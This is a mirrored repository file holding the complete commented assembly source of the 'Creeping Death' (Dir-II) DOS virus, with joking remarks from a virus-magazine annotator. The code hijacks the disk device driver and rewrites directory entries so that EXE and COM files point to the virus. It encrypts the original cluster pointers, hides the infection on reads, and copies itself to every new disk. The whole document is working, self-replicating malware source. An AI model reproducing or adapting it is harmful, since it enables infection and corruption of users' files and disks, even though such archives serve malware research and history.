mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-21 10:56:10 +00:00
564 lines
29 KiB
NASM
564 lines
29 KiB
NASM
; Dark Angel's comments: I spent my entire waking hours looking at this virus.
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; I love it. It is my life. I worship the drive it
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; infects. Take a look at it. Let not my troubles be
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; in vain. Why did I do this? I sacrifice my life for
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; the benefit of 40Hex. If you don't read this, I'm
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; gonna go join [NuKE].
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; Creeping Death V 1.0
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;
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; (C) Copyright 1991 by VirusSoft Corp.
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i13org = 5f8h
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i21org = 5fch
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dir_2 segment byte public
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assume cs:dir_2, ds:dir_2
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org 100h
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start:
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mov sp,600h ; Set up the stack pointer
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inc word ptr counter ; Generation counter
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xor cx,cx
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mov ds,cx ; DS points to interrupt table
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lds ax, ds:[0c1h] ; Find interrupt 30h
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add ax,21h ; Change it to Int 21h
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push ds ; Save it on stack for use by
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push ax ; subroutine "jump"
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mov ah,30h ; Get DOS version
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call jump
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cmp al,4 ; DOS 4.X+ : SI = 0
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sbb si,si ; DOS 2/3 : SI = -1
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mov byte ptr [drive+2],byte ptr -1 ; Initialise last drive to
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; "never accessed"
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mov bx,60h ; Adjust memory in ES to
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mov ah,4ah ; BX paragraphs.
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call jump
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mov ah,52h ; Get DOS List of Lists
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call jump ; to ES:BX
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push es:[bx-2] ; Save Segment of first MCB
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lds bx,es:[bx] ; DS:BX -> 1st DPB
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; (Drive parameter block)
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search: mov ax,[bx+si+15h] ; Get segment of device driver
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cmp ax,70h ; Is it CONFIG? (I think)
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jne next ; If not, try again
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xchg ax,cx ; Move driver segment to CX
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mov [bx+si+18h],byte ptr -1 ; Flag block must be rebuilt
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mov di,[bx+si+13h] ; Save offset of device driver
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; Original device driver
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; address in CX:DI
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mov [bx+si+13h],offset header ; Replace with our own
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mov [bx+si+15h],cs ; (header)
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next: lds bx,[bx+si+19h] ; Get next device block
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cmp bx,-1 ; Is it the last one?
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jne search ; If not, search it
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jcxz install
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pop ds ; Restore segment of first
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mov ax,ds ; MCB
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add ax,ds:[3] ; Go to next MCB
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inc ax ; AX = segment next MCB
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mov dx,cs ; DX = MCB owning current
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dec dx ; program
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cmp ax,dx ; Are these the same?
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jne no_boot ; If not, we are not currently
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; in the middle of a reboot
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add word ptr ds:[3],61h ; Increase length owned by
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; MCB by 1552 bytes
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no_boot: mov ds,dx ; DS = MCB owning current
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; program
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mov word ptr ds:[1],8 ; Set owner = DOS
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mov ds,cx ; DS = segment of original
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; device driver
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les ax,[di+6] ; ES = offset int handler
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; AX = offset strategy entry
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mov word ptr cs:str_block,ax ; Save entry point
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mov word ptr cs:int_block,es ; And int block for use in
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; function _in
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cld ; Scan for the write
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mov si,1 ; function in the
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scan: dec si ; original device driver
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lodsw
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cmp ax,1effh
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jne scan
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mov ax,2cah ; Wicked un-yar place o'
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cmp [si+4],ax ; doom.
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je right
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cmp [si+5],ax
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jne scan
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right: lodsw
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push cs
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pop es
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mov di,offset modify+1 ; Save address of patch
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stosw ; area so it can be changed
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xchg ax,si ; later.
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mov di,offset i13org ; This is in the stack, but
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cli ; it is used by "i13pr"
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movsw
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movsw
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mov dx,0c000h ; Scan for hard disk ROM
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; Start search @ segment C000h
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fdsk1: mov ds,dx ; Load up the segment
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xor si,si ; atart at offset 0000h
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lodsw ; Scan for the signature
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cmp ax,0aa55h ; Is it the signature?
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jne fdsk4 ; If not, change segment
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cbw ; clear AH
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lodsb ; load a byte to AL
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mov cl,9
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sal ax,cl ; Shift left, 0 filled
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fdsk2: cmp [si],6c7h
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jne fdsk3
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cmp word ptr [si+2],4ch
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jne fdsk3
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push dx ; Save the segment
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push [si+4] ; and offset on stack
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jmp short death ; for use by i13pr
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install: int 20h
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file: db "c:",255,0
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fdsk3: inc si ; Increment search offset
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cmp si,ax ; If we are not too high,
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jb fdsk2 ; try again
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fdsk4: inc dx ; Increment search segment
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cmp dh,0f0h ; If we are not in high
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jb fdsk1 ; memory, try again
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sub sp,4 ; effectively push dummy vars.
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death: push cs ; on stack for use by i13pr
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pop ds
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mov bx,ds:[2ch] ; Get environment from PSP
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mov es,bx
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mov ah,49h ; Release it (to save memory)
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call jump
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xor ax,ax
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test bx,bx ; Is BX = 0?
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jz boot ; If so, we are booting now
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mov di,1 ; and not running a file
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seek: dec di ; Search for end of
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scasw ; the environment block
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jne seek
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lea si,[di+2] ; SI points to filename
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jmp short exec ; (in DOS 3.X+)
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; Execute that file
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boot: mov es,ds:[16h] ; get PSP of parent
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mov bx,es:[16h] ; get PSP of parent
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dec bx ; go to its MCB
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xor si,si
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exec: push bx
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mov bx,offset param ; Set up parameter block
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; for EXEC function
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mov [bx+4],cs ; segment to command line
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mov [bx+8],cs ; segment to 1st FCB
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mov [bx+12],cs ; segment to 2nd FCB
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pop ds
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push cs
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pop es
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mov di,offset f_name
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push di ; Save filename offset
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mov cx,40 ; Copy the filename to
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rep movsw ; the buffer
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push cs
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pop ds
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mov ah,3dh ; Handle open file
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mov dx,offset file ; "c:<3A>",0
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call jump
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pop dx ; DS:DX -> filename
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mov ax,4b00h ; Load and Execute
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call jump ; ES:BX = param block
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mov ah,4dh ; Get errorlevel
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call jump
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mov ah,4ch ; Terminate
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jump: pushf ; Simulate an interrupt 21h
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call dword ptr cs:[i21org]
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ret
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;--------Installation complete
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i13pr: mov ah,3 ; Write AL sectors from ES:BX
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jmp dword ptr cs:[i13org] ; to track CH, sector CL,
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; head DH, drive DL
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main: push ax ; driver
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push cx ; strategy block
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push dx
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push ds
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push si
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push di
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push es ; Move segment of parameter
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pop ds ; block to DS
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mov al,[bx+2] ; [bx+2] holds command code
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cmp al,4 ; Input (read)
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je input
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cmp al,8 ; Output (write)
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je output
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cmp al,9 ; Output (write) with verify
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je output
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call in_ ; Call original device
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cmp al,2 ; Request build BPB
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jne ppp ; If none of the above, exit
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lds si,[bx+12h] ; DS:SI point to BPB table
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mov di,offset bpb_buf ; Replace old pointer with
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mov es:[bx+12h],di ; a pointer to our own
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mov es:[bx+14h],cs ; BPB table
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push es ; Save segment of parameters
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push cs
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pop es
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mov cx,16 ; Copy the old BPB table to
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rep movsw ; our own
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pop es ; Restore parameter segment
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push cs
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pop ds
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mov al,[di+2-32] ; AL = sectors per allocation
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cmp al,2 ; unit. If less than
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adc al,0 ; 2, increment
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cbw ; Extend sign to AH (clear AH)
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cmp word ptr [di+8-32],0 ; Is total number sectors = 0?
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je m32 ; If so, big partition (>32MB)
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sub [di+8-32],ax ; Decrease space of disk by
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; one allocation unit(cluster)
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jmp short ppp ; Exit
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m32: sub [di+15h-32],ax ; Handle large partitions
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sbb word ptr [di+17h-32],0
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ppp: pop di
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pop si
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pop ds
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pop dx
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pop cx
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pop ax
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rts: retf ; We are outta here!
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output: mov cx,0ff09h
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call check ; is it a new disk?
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jz inf_sec ; If not, go away
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call in_ ; Call original device handler
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jmp short inf_dsk
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inf_sec: jmp _inf_sec
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read: jmp _read
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read_: add sp,16 ; Restore the stack
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jmp short ppp ; Leave device driver
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input: call check ; Is it a new disk?
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jz read ; If not, leave
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inf_dsk: mov byte ptr [bx+2],4 ; Set command code to READ
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cld
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lea si,[bx+0eh] ; Load from buffer address
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mov cx,8 ; Save device driver request
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save: lodsw ; on the stack
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push ax
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loop save
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mov word ptr [bx+14h],1 ; Starting sector number = 1
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; (Read 1st FAT)
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call driver ; Read one sector
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jnz read_ ; If error, exit
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mov byte ptr [bx+2],2 ; Otherwise build BPB
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call in_ ; Have original driver do the
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; work
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lds si,[bx+12h] ; DS:SI points to BPB table
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mov ax,[si+6] ; Number root directory entries
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add ax,15 ; Round up
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mov cl,4
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shr ax,cl ; Divide by 16 to find sectors
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; of root directory
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mov di,[si+0bh] ; DI = sectors/FAT
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add di,di ; Double for 2 FATs
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stc ; Add one for boot record
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adc di,ax ; Add sector size of root dir
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push di ; to find starting sector of
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; data (and read)
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cwd ; Clear DX
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mov ax,[si+8] ; AX = total sectors
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test ax,ax ; If it is zero, then we have
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jnz more ; an extended partition(>32MB)
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mov ax,[si+15h] ; Load DX:AX with total number
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mov dx,[si+17h] ; of sectors
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more: xor cx,cx
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sub ax,di ; Calculate FAT entry for last
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; sector of disk
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sbb dx,cx
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mov cl,[si+2] ; CL = sectors/cluster
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div cx ; AX = cluster #
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cmp cl,2 ; If there is more than 1
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sbb ax,-1 ; cluster/sector, add one
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push ax ; Save cluster number
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call convert ; AX = sector number to read
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; DX = offset in sector AX
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; of FAT entry
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; DI = mask for EOF marker
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mov byte ptr es:[bx+2],4 ; INPUT (read)
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mov es:[bx+14h],ax ; Starting sector = AX
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call driver ; One sector only
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again: lds si,es:[bx+0eh] ; DS:SI = buffer address
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add si,dx ; Go to FAT entry
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sub dh,cl ; Calculate a new encryption
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adc dx,ax ; value
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mov word ptr cs:gad+1,dx ; Change the encryption value
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cmp cl,1 ; If there is 0 cluster/sector
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je small_ ; then jump to "small_"
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mov ax,[si] ; Load AX with offset of FAT
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; entry
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and ax,di ; Mask it with value from
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; "convert" then test to see
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; if the sector is fine
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cmp ax,0fff7h ; 16 bit reserved/bad
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je bad
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cmp ax,0ff7h ; 12 bit reserved/bad
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je bad
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cmp ax,0ff70h ; 12 bit reserved/bad
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jne ok
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bad: pop ax ; Tried to replicate on a bad
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dec ax ; cluster. Try again on a
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push ax ; lower one.
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call convert ; Find where it is in the FAT
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jmp short again ; and try once more
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small_: not di ; Reverse mask bits
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and [si],di ; Clear other bits
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pop ax ; AX = cluster number
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push ax
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inc ax ; Need to do 2 consecutive
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push ax ; bytes
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mov dx,0fh
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test di,dx
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jz here
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inc dx ; Multiply by 16
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mul dx
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here: or [si],ax ; Set cluster to next
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pop ax ; Restore cluster of write
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call convert ; Calculate buffer offset
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mov si,es:[bx+0eh] ; Go to FAT entry (in buffer)
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add si,dx
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mov ax,[si]
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and ax,di
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ok: mov dx,di ; DI = mask from "convert"
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dec dx
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and dx,di ; Yerg!
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not di
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and [si],di
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or [si],dx ; Set [si] to DI
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cmp ax,dx ; Did we change the FAT?
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pop ax ; i.e. Are we already on this
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pop di ; disk?
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mov word ptr cs:pointer+1,ax ; Our own starting cluster
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je _read_ ; If we didn't infect, then
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; leave the routine. Oh
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; welp-o.
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mov dx,[si]
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push ds
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push si
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call write ; Update the FAT
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pop si
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pop ds
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jnz _read_ ; Quit if there's an error
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call driver
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cmp [si],dx
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jne _read_
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dec ax
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dec ax
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mul cx ; Multiply by sectors/cluster
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; to find the sector of the
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; write
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add ax,di
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adc dx,0
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push es
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pop ds
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mov word ptr [bx+12h],2 ; Byte/sector count
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mov [bx+14h],ax ; Starting sector #
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test dx,dx
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jz less
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mov word ptr [bx+14h],-1 ; Flag extended partition
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mov [bx+1ah],ax ; Handle the sector of the
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mov [bx+1ch],dx ; extended partition
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less: mov [bx+10h],cs ; Transfer address segment
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mov [bx+0eh],100h ; and the offset (duh)
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call write ; Zopy ourselves!
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; (We want to travel)
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_read_: std
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lea di,[bx+1ch] ; Restore device driver header
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mov cx,8 ; from the stack
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load: pop ax
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stosw
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loop load
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_read: call in_ ; Call original device handler
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mov cx,9
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_inf_sec:
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mov di,es:[bx+12h] ; Bytes/Sector
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lds si,es:[bx+0eh] ; DS:SI = pointer to buffer
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sal di,cl ; Multiply by 512
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; DI = byte count
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xor cl,cl
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add di,si ; Go to address in the buffer
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xor dl,dl ; Flag for an infection in
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; function find
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push ds
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push si
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call find ; Infect the directory
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jcxz no_inf
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call write ; Write it back to the disk
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and es:[bx+4],byte ptr 07fh ; Clear error bit in status
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; word
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no_inf: pop si
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pop ds
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inc dx ; Flag for a decryption in
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; function find
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call find ; Return right information to
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; calling program
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jmp ppp
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;--------Subroutines
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find: mov ax,[si+8] ; Check filename extension
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cmp ax,"XE" ; in directory structure
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jne com
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cmp [si+10],al
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je found
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com: cmp ax,"OC"
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jne go_on
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cmp byte ptr [si+10],"M"
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jne go_on
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found: test [si+1eh],0ffc0h ; >4MB ; Check file size high word
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jnz go_on ; to see if it is too big
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test [si+1dh],03ff8h ; <2048B ; Check file size low word
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jz go_on ; to see if it is too small
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test [si+0bh],byte ptr 1ch ; Check attribute for subdir,
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jnz go_on ; volume label or system file
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test dl,dl ; If none of these, check DX
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jnz rest ; If not 0, decrypt
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pointer: mov ax,1234h ; mov ax, XX modified elsewhere
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cmp ax,[si+1ah] ; Check for same starting
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; cluster number as us
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je go_on ; If it is, then try another
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xchg ax,[si+1ah] ; Otherwise make it point to
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; us.
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gad: xor ax,1234h ; Encrypt their starting
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; cluster
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mov [si+14h],ax ; And put it in area reserved
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; by DOS for no purpose
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loop go_on ; Try another file
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rest: xor ax,ax ; Disinfect the file
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xchg ax,[si+14h] ; Get starting cluster
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xor ax,word ptr cs:gad+1 ; Decrypt the starting cluster
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mov [si+1ah],ax ; and put it back
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go_on: db 2eh,0d1h,6 ; rol cs:[gad+1], 1
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dw offset gad+1 ; Change encryption and
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add si,32 ; go to next file
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cmp di,si ; If it is not past the end of
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jne find ; the buffer, then try again
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ret ; Otherwise quit
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check: mov ah,[bx+1] ; ah = unit code (block device
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; only)
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drive: cmp ah,-1 ; cmp ah, XX can change.
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; Compare with the last call
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; -1 is just a dummy
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; impossible value that will
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; force the change to be true
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mov byte ptr cs:[drive+2],ah ; Save this call's drive
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jne changed ; If not the same as last call
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; media has changed
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push [bx+0eh] ; If it is the same physical
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; drive, see if floppy has
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; been changed
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mov byte ptr [bx+2],1 ; Tell original driver to do a
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call in_ ; media check (block only)
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cmp byte ptr [bx+0eh],1 ; Returns 1 in [bx+0eh] if
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pop [bx+0eh] ; media has not been changed
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mov [bx+2],al ; Restore command code
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changed: ret ; CF,ZF set if media has not
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; been changed, not set if
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; has been changed or we don't
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; know
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write: cmp byte ptr es:[bx+2],8 ; If we want OUTPUT, go to
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jae in_ ; original device handler
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; and return to caller
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mov byte ptr es:[bx+2],4 ; Otherwise, request INPUT
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mov si,70h
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mov ds,si ; DS = our segment
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modify: mov si,1234h ; Address is changed elsewhere
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push [si]
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push [si+2]
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mov [si],offset i13pr
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mov [si+2],cs
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call in_ ; Call original device handler
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pop [si+2]
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pop [si]
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ret
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driver: mov word ptr es:[bx+12h],1 ; One sector
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in_: ; in_ first calls the strategy
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; of the original device
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; driver and then calls the
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; interrupt handler
|
||
db 09ah ; CALL FAR PTR
|
||
str_block:
|
||
dw ?,70h ; address
|
||
db 09ah ; CALL FAR PTR
|
||
int_block:
|
||
dw ?,70h ; address
|
||
test es:[bx+4],byte ptr 80h ; Was there an error?
|
||
ret
|
||
|
||
convert: cmp ax,0ff0h ; 0FFF0h if 12 bit FAT
|
||
jae fat_16 ; 0FF0h = reserved cluster
|
||
mov si,3 ; 12 bit FAT
|
||
xor word ptr cs:[si+gad-1],si ; Change the encryption value
|
||
mul si ; Multiply by 3 and
|
||
shr ax,1 ; divide by 2
|
||
mov di,0fffh ; Mark it EOF (low 12 bits)
|
||
jnc cont ; if it is even, continue
|
||
mov di,0fff0h ; otherwise, mark it EOF (high
|
||
jmp short cont ; 12 bits) and then continue
|
||
fat_16: mov si,2 ; 16 bit FAT
|
||
mul si ; Double cluster #
|
||
mov di,0ffffh ; Mark it as end of file
|
||
cont: mov si,512
|
||
div si ; AX = sector number
|
||
; (relative to start of FAT)
|
||
; DX = offset in sector AX
|
||
header: inc ax ; Increment AX to account for
|
||
ret ; boot record
|
||
|
||
counter: dw 0
|
||
|
||
dw 842h ; Attribute
|
||
; Block device
|
||
; DOS 3 OPEN/CLOSE removable
|
||
; media calls supported
|
||
; Generic IOCTL call supported
|
||
; Supports 32 bit sectors
|
||
dw offset main ; Strategy routine
|
||
dw offset rts ; Interrupt routine (rtf)
|
||
db 7fh ; Number of subunits supported
|
||
; by this driver. Wow, lookit
|
||
; it -- it's so large and juicy
|
||
|
||
; Parameter block format:
|
||
; 0 WORD Segment of environment
|
||
; 2 DWORD pointer to command line
|
||
; 6 DWORD pointer to 1st default FCB
|
||
;10 DWORD pointer to 2nd default FCB
|
||
param: dw 0,80h,?,5ch,?,6ch,?
|
||
|
||
bpb_buf: db 32 dup(?)
|
||
f_name: db 80 dup(?)
|
||
|
||
;--------The End.
|
||
dir_2 ends
|
||
end start
|